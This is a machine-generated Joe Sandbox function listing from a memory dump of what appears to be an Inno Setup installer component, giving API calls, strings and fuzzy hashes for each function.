Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550HandleModule
String ID: DisableProcessWindowsGhosting$user32.dll
API String ID: 920177481-834958232
Opcode ID: ff3fd83ae6f82ac6f64e81510813527fd5869980979b22b6fcb549de794fba82
Instruction ID: b98143b08d5470dfc2a62f35b387981235197b5dc25cf883adaefec176bf8dcf
Opcode Fuzzy Hash: ff3fd83ae6f82ac6f64e81510813527fd5869980979b22b6fcb549de794fba82
Instruction Fuzzy Hash: 39B00280781A133C991072F24D56B1F4548CC9475DB251E673850F51C6DF6C89416EBE

Uniqueness

Uniqueness Score: -1.00%

Function 00413DC0 Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00413E0E
GetDesktopWindow.USER32 ref: 00413EC6

Part of subcall function 00418F88: 6F7FB5E0.COMCTL32(00000000,?,00413EF6,?,?,?,?,00413BBB,00000000,00413BCE), ref: 00418FA4
Part of subcall function 00418F88: ShowCursor.USER32(00000001,00000000,?,00413EF6,?,?,?,?,00413BBB,00000000,00413BCE), ref: 00418FC1

SetCursor.USER32(00000000,?,?,?,?,00413BBB,00000000,00413BCE), ref: 00413F04

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CursorDesktopWindow$Show
String ID:
API String ID: 2074268717-0
Opcode ID: 6546559de08365ef47c6e7563df171fa08e100ddb20537a13f1ad1f73c073373
Instruction ID: f32426dca888e2d56ee745e629d979e7c9b3849a6447fc5aeac6aa2206e082a3
Opcode Fuzzy Hash: 6546559de08365ef47c6e7563df171fa08e100ddb20537a13f1ad1f73c073373
Instruction Fuzzy Hash: 80412C70E012109FC714FF29E9C5A9A7BE5AB45309B14887FE805CB3A5CB38EC81CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00408AE8 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408B09
LoadStringA.USER32 ref: 00408B78
LoadStringA.USER32 ref: 00408C13
MessageBoxA.USER32 ref: 00408C52

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: LoadString$FileMessageModuleName
String ID:
API String ID: 704749118-0
Opcode ID: e0cc4281da798df7fe111bb9cd80f3001d0db584bc853989daa63a0f40e91ddb
Instruction ID: 44a86db057f9d63c56723edc699d4c9bad8178255c12b1c4832d910ab8f3ac03
Opcode Fuzzy Hash: e0cc4281da798df7fe111bb9cd80f3001d0db584bc853989daa63a0f40e91ddb
Instruction Fuzzy Hash: A93145706093805FE770EB65C945BDB77E89B86704F04483EB6C8EB2D2DB789904876B

Uniqueness

Uniqueness Score: -1.00%

Function 00488588 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,?,00000000), ref: 004885EC
OffsetRect.USER32(?,00000000,?), ref: 00488607
OffsetRect.USER32(?,?,00000000), ref: 00488621
OffsetRect.USER32(?,00000000,?), ref: 0048863C

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: e930ae5f9c6793fa844807e4c318ccb697997ed23c9637388a8b9729ef4b8dee
Instruction ID: 5b824585aa51fb87f70f9c434e37a28c71bd38defd619a23ada872ee26880216
Opcode Fuzzy Hash: e930ae5f9c6793fa844807e4c318ccb697997ed23c9637388a8b9729ef4b8dee
Instruction Fuzzy Hash: 172160B67042056FC700EE69CC85E6FB7DAEBC4300F548A2EF944D724AEA34ED448765

Uniqueness

Uniqueness Score: -1.00%

Function 004172E0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00417328
SetCursor.USER32(00000000), ref: 0041736B
GetLastActivePopup.USER32(?), ref: 00417395
GetForegroundWindow.USER32(?), ref: 0041739C

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Cursor$ActiveForegroundLastPopupWindow
String ID:
API String ID: 1959210111-0
Opcode ID: 2ee17bafeec45e60645a682f750ce4ef553eb04d9f4138f0cc99ea1327cdb86b
Instruction ID: bac7e200b11387e1ba21beeddde03211dbe408e99f5f69e57673f47c47d5fcf6
Opcode Fuzzy Hash: 2ee17bafeec45e60645a682f750ce4ef553eb04d9f4138f0cc99ea1327cdb86b
Instruction Fuzzy Hash: 04217F316092048AC710EF2AC845ADF33B1AB44764B46496EEC699B392E73DDC81D75D

Uniqueness

Uniqueness Score: -1.00%

Function 00488318 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(8B500000,00000000,?), ref: 00488335
MulDiv.KERNEL32(50142444,00000008,?), ref: 00488348
MulDiv.KERNEL32(F7D483E8,00000000,?), ref: 00488364
MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 0048838B

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00410b4d8b0f69e6e5972e21e3cdbb834df30f1611a0f3f66f7c34ab6d2831f5
Instruction ID: 3251cc3186a811aa5037efa69265713b7995ec2fe77ecce64b3da02d6926583a
Opcode Fuzzy Hash: 00410b4d8b0f69e6e5972e21e3cdbb834df30f1611a0f3f66f7c34ab6d2831f5
Instruction Fuzzy Hash: 7B21B9B6A00105AFCB40DFADC884E9EB7FCAF0C314B504596B918DB246D674ED408B54

Uniqueness

Uniqueness Score: -1.00%

Function 0041F548 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32 ref: 0041F569
UnregisterClassA.USER32 ref: 0041F592
RegisterClassA.USER32 ref: 0041F59C
SetWindowLongA.USER32 ref: 0041F5D7

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 10a9a7078d67312e7ce8e8337c3ec44bd7b0364bdc37ad7fed2a3dd39bb75202
Instruction ID: c21b3c6f039f3a1543fbbeaf4668144afd44c643da5632c1bde523ec4f1d684a
Opcode Fuzzy Hash: 10a9a7078d67312e7ce8e8337c3ec44bd7b0364bdc37ad7fed2a3dd39bb75202
Instruction Fuzzy Hash: 7F012D71640104BBCF10EFA9EC81E9F3799A709318F00463AB905EB2E2D635E8159B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040D2C8 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00400000,00000000,00000000), ref: 0040D2DF
LoadResource.KERNEL32(00400000,72756F73,0040AA80,00400000,00000001,00000000,?,0040D23C,00000000,?,?,00000000,?,00472220,0000000A,00000000), ref: 0040D2F9
SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040AA80,00400000,00000001,00000000,?,0040D23C,00000000,?,?,00000000,?,00472220), ref: 0040D313
LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040AA80,00400000,00000001,00000000,?,0040D23C,00000000,?,?,00000000), ref: 0040D31D

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 3bb43f5d52285fdfed78278d9ca77677ef357f628772948a1ed4c0710a20c811
Instruction ID: 542866f3073ff163a702ba7e2e3de952a852996e327bb70ca280f3e64d2c5601
Opcode Fuzzy Hash: 3bb43f5d52285fdfed78278d9ca77677ef357f628772948a1ed4c0710a20c811
Instruction Fuzzy Hash: CBF062B26056046F9708FE9D9881D5B77EDDE88264310007FF91CE7286DA38ED058B78

Uniqueness

Uniqueness Score: -1.00%

Function 00454730 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0

6CAD6690.ADVAPI32(?,00000000,?,00000002,00000000,?,?,00000000,004584F9), ref: 0045476C
RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,00000000,004584F9), ref: 00454775
RemoveFontResourceA.GDI32(00000000), ref: 00454782
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00454796

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseD6690D6790FontMessageNotifyRemoveResourceSend
String ID:
API String ID: 911274636-0
Opcode ID: 37287cc32b2c29381a48a7316915b6ded4d7798c5ea5e6b1da3b2d3d66d5b5a8
Instruction ID: 2b422e65405ee2d92d30493631ccf6b7ae4006e84f62635805817285d1b95c04
Opcode Fuzzy Hash: 37287cc32b2c29381a48a7316915b6ded4d7798c5ea5e6b1da3b2d3d66d5b5a8
Instruction Fuzzy Hash: BBF030B2B4470136EA20B7B65C46F1B528C8F48788F14883EBA44EB1D2D67CD944966D

Uniqueness

Uniqueness Score: -1.00%

Function 00424308 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON

Download Yara Rule

APIs

GetLastActivePopup.USER32(?), ref: 00424314
IsWindowVisible.USER32 ref: 00424325
IsWindowEnabled.USER32(?), ref: 0042432F
SetForegroundWindow.USER32(?,?,?,?,?,00486518,00000000,00486C30), ref: 00424339

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Window$ActiveEnabledForegroundLastPopupVisible
String ID:
API String ID: 2280970139-0
Opcode ID: d4c34c35976f1a4744d72fad739808c656fe72c1b6fedfe1ace3690ff732f2b4
Instruction ID: 093e33b802470a6257887afd832b24ea788dd3b2501e4f7f6a6e70dd687b8a9b
Opcode Fuzzy Hash: d4c34c35976f1a4744d72fad739808c656fe72c1b6fedfe1ace3690ff732f2b4
Instruction Fuzzy Hash: E4E08C61702635579A21B63A2982BDB95CD8D45344346007BBC50FB283DA2DDC1081FC

Uniqueness

Uniqueness Score: -1.00%

Function 00406384 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

GlobalHandle.KERNEL32 ref: 00406387
GlobalUnWire.KERNEL32(00000000), ref: 0040638E
GlobalReAlloc.KERNEL32 ref: 00406393
GlobalFix.KERNEL32 ref: 00406399

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Global$AllocHandleWire
String ID:
API String ID: 2210401237-0
Opcode ID: 2ccb1316f656a9feec663ea7d40f446e50994104d6d7ba694866cbb55bb477a3
Instruction ID: 358e25fb7084f445ff186797d019571ee60d51755ee9ae5fd621e3f1806715ee
Opcode Fuzzy Hash: 2ccb1316f656a9feec663ea7d40f446e50994104d6d7ba694866cbb55bb477a3
Instruction Fuzzy Hash: 47B009E4961E0178ED4873B26C0FD3F387DD88870D38049AE3440BA497987CBC00883E

Uniqueness

Uniqueness Score: -1.00%

Function 00464134 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 247windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 00464321
EnableMenuItem.USER32 ref: 00464327

Strings

CurPageChanged, xrefs: 004644AF

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Menu$EnableItemSystem
String ID: CurPageChanged
API String ID: 3692539535-2490978513
Opcode ID: ffd6a85f3733a3a3d420da159be494d14865ac897c70986fd094c254901061d2
Instruction ID: 46ec497cb3a8356c226a7c5266c94ca15ed80b02e01e615ee1c1d55c4ed561bc
Opcode Fuzzy Hash: ffd6a85f3733a3a3d420da159be494d14865ac897c70986fd094c254901061d2
Instruction Fuzzy Hash: 97A10638704204DFCB15DBA9D999AED73F5AB89304F2541F6F8049B362DB38AE41DB09

Uniqueness

Uniqueness Score: -1.00%

Function 0046FD68 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047151F,?,00000000,00000000,00000001,00000000,00470005,?,00000000), ref: 0046FFC9

Strings

Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0046FE3D
Failed to parse "reg" constant, xrefs: 0046FFD0

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Close
String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
API String ID: 3535843008-1938159461
Opcode ID: 0a1d62dcc402932a6303958043aebf9e95749352cd083518649c1eb0e2dc5052
Instruction ID: 47136acb6e2bb56904c55ddf5f28219fb2777eb9605b9a5b61fca817b4fe90c1
Opcode Fuzzy Hash: 0a1d62dcc402932a6303958043aebf9e95749352cd083518649c1eb0e2dc5052
Instruction Fuzzy Hash: 69816071E001089FCB10EF95D481ADEBBF9AF48314F10817BE854A7396D739AE09CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00465C08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON

Download Yara Rule

Strings

Failed to proceed to next wizard page; aborting., xrefs: 00465CF4
Failed to proceed to next wizard page; showing wizard., xrefs: 00465D08

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID:
String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
API String ID: 0-1974262853
Opcode ID: b8cf2fbb86ed8b2886ba9200a479e6093de5ea49a7fadad3ead1447514cfb89c
Instruction ID: c71bcc5f1162af886fc49a198fbb8a16c06835f0575393f154fbba21c83105a6
Opcode Fuzzy Hash: b8cf2fbb86ed8b2886ba9200a479e6093de5ea49a7fadad3ead1447514cfb89c
Instruction Fuzzy Hash: 9731CF30A00B44AFD700EFA5D985E9D77F4EB09714F6184BAF404AB391E738AE00DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 0045BFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0045C05A

Part of subcall function 0041EF6C: GetCurrentThreadId.KERNEL32 ref: 0041EFBB
Part of subcall function 0041EF6C: 72E5AC10.USER32(00000000,0041EF1C,00000000,00000000,0041EFD8,?,00000000,0041F00F,?,00000000,00000000,021E2410), ref: 0041EFC1

757DB9A0.COMDLG32(0000004C,00000000,0045C0C7,?,00000000,0045C0FB), ref: 0045C08F

Strings

L, xrefs: 0045C006

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ActiveCurrentThreadWindow
String ID: L
API String ID: 1335379141-2909332022
Opcode ID: dde8404dfa06f7440ff49d778366eea8e33d68dac2129b96da576e60149b55c1
Instruction ID: ba71598d2f393434b0e99db4b532341471b8ac22d8944c6b47070d72b39e1203
Opcode Fuzzy Hash: dde8404dfa06f7440ff49d778366eea8e33d68dac2129b96da576e60149b55c1
Instruction Fuzzy Hash: CA310E71900348AFDF11DFA6C8915DEBBB8EB49704F0184AAE904A7681DB785A04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004474E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00403DEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403E26
Part of subcall function 00403DEC: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403E31

SysFreeString.OLEAUT32(?), ref: 00447596

Strings

Unknown Method, xrefs: 0044756F
NIL Interface Exception, xrefs: 00447538

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: String$AllocByteCharFreeMultiWide
String ID: NIL Interface Exception$Unknown Method
API String ID: 3952431833-1023667238
Opcode ID: 65763d5aad74e0db49a0dd09087323ef94750999bde3a1973c339012d0364a9c
Instruction ID: 904846feee96eb5d243ebb56e4b0f3edd67b582151c079b437bfe0108e5b6a29
Opcode Fuzzy Hash: 65763d5aad74e0db49a0dd09087323ef94750999bde3a1973c339012d0364a9c
Instruction Fuzzy Hash: 1B11B770A08204AFE710EFA58C81A6EBABCEB09704F91407EF500E7681C7799904C729

Uniqueness

Uniqueness Score: -1.00%

Function 0048936C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

6CF47180.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00489434,?,00489428,00000000,0048940F), ref: 004893DA
CloseHandle.KERNEL32(00489C00,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00489434,?,00489428,00000000), ref: 004893F1

Part of subcall function 004892C4: GetLastError.KERNEL32(00000000,0048935C,?,?,?,?), ref: 004892E8

Strings

D, xrefs: 004893B4

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseErrorF47180HandleLast
String ID: D
API String ID: 1518912886-2746444292
Opcode ID: e79b9ecf8d0fbe05fd8aac1f9beae76a65c4d50c8133bd11e1f1fc5bf30d756a
Instruction ID: 8a602a59bd543ca9148e4aba1d84fa657435f2b2be7756fef3cd3a4e41c96cac
Opcode Fuzzy Hash: e79b9ecf8d0fbe05fd8aac1f9beae76a65c4d50c8133bd11e1f1fc5bf30d756a
Instruction Fuzzy Hash: 42015EB1604608AFDB04EBA5CC42EAE77ACDF08714F55447AF904E72C1D6789E018A68

Uniqueness

Uniqueness Score: -1.00%

Function 0042DBFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DC10
RegEnumValueA.ADVAPI32 ref: 0042DC50

Strings

Inno Setup: No Icons, xrefs: 0042DC0E

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Value$EnumQuery
String ID: Inno Setup: No Icons
API String ID: 1576479698-2016326496
Opcode ID: c530550c5b400f27d3b354827e66c455718bdea8dfe3a8ec58b02f593ba09778
Instruction ID: a380a1bc47b6b2e444766c5ac2e74b614384efc47358369cee9a4f1bd1172e85
Opcode Fuzzy Hash: c530550c5b400f27d3b354827e66c455718bdea8dfe3a8ec58b02f593ba09778
